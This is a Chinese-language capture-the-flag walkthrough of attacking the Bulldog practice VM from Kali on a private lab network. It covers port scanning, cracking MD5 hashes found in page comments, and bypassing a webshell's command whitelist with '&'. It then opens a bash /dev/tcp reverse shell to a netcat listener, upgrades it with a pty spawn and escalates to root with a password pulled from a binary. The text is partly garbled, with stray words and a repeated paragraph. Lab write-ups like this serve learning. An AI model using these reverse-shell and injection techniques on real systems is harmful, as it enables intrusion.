kali和bulldog靶机的的ip地址在同一个网段
本测试环境:
kali
:192.168.56.102
bulldog
:192.168.56.101python
利用kali的netdiscover
工具扫描靶机ip地址
web
kali和bulldog靶机的的ip地址在同一个网段
本测试环境:
kali
:192.168.56.102
bulldog
:192.168.56.101shell
利用kali的nmap
工具扫描靶机ip地址浏览器
nmap -p- 192.168.56.101
扫描目标靶机端口的详细服务信息bash
nmap -p23,80,8080 -A -T4 192.168.56.101
web服务是python2
用浏览器访问192.168.56.101
并未发现异常;接下来扫描网站
发现了 /dev /admin robots.txt
/admin 是一个登陆页面,SQL注入并未成功
tcp
/robots.txt 并未发现异常
工具
访问/dev,发现了webshell链接,可是显示须要验证身份,可能须要先登陆才能有权限使用此webshell
学习
在注释中发现了异常
MD5值加密,使用在线解密网站解密试试。
成功解密两个帐号密码:测试
白名单限制了使用的命令,经过&
绕过
网站
echo 'bash -i >& /dev/tcp/192.168.56.102/6666 0>&1'|bash
反弹shell到kali上nc -nvlp 6666
使用普通用户的权限并无发现要得到的信息,因而要提高root权限
在/home目录下发现bulldogadmin文件夹,看文件名以为里面应该有东西
发现了隐藏文件夹,进去看看里面的东西
使用cat
命令没有发现异常,使用strings
发现下面了信息,去掉应该H是root密码---> SUPERultimatePASSWORDyouCANTget
在得到的shell界面直接切换root用户报错
因而使用python脚本
python -c 'import pty; pty.spawn("/bin/bash")'
输入刚才获取的密码便可
成功获取flag
后续技能学习:
python -c 'import pty; pty.spawn("/bin/bash")'
此类经常使用的shell代码